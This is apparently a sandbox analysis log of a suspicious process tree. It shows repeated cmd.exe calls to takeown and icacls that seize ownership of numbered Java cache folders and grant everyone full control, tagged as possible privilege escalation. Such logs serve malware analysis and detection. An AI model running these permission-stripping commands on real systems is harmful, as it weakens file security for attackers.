C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\14 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\14 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\143⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\14 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\15 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\15 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\153⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\15 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\16 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\16 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\163⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\16 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\17 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\17 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\173⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\17 /grant everyone:(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\18 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\18 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\183⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\18 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\19 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\19 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\193⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\19 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\2 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\2 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\23⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\2 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\20 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\20 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\203⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\20 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\21 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\21 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\213⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\21 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\22 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\22 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\223⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\22 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\23 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\23 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\233⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\23 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\24 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\24 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\243⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\24 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\25 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\25 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\253⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\25 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\26 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\26 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\263⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\26 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\27 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\27 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\273⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\27 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\28 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\28 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\283⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\28 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\29 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\29 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\293⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\29 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\3 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\3 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\33⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\3 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\30 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\30 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\303⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\30 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\31 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\31 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\313⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\31 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\32 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\32 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\323⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\32 /grant everyone:(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\33 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\33 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\333⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\33 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\34 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\34 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\343⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\34 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\35 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\35 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\353⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\35 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\36 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\36 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\363⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\36 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\37 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\37 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\373⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\37 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\38 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\38 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\383⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\38 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\39 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\39 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\393⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\39 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\4 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\4 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\43⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\4 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\40 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\40 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\403⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\40 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\41 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\41 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\413⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\41 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\42 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\42 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\423⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\42 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\43 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\43 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\433⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\43 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\44 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\44 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\443⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\44 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\45 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\45 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\453⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\45 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\46 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\46 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\463⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\46 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\47 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\47 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\473⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\47 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\48 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\48 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\483⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\48 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\49 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\49 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\493⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\49 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\5 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\5 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\53⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\5 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\50 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\50 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\503⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\50 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\51 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\51 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\513⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\51 /grant everyone:(f)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\52 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\52 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\523⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\52 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\53 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\53 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\533⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\53 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\54 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\54 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\543⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\54 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\55 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\55 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\553⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\55 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\56 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\56 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\563⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\56 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\57 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\57 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\573⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\57 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\58 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\58 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\583⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\58 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\59 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\59 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\593⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\59 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\6 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\6 /grant everyone:(f)2⤵
-
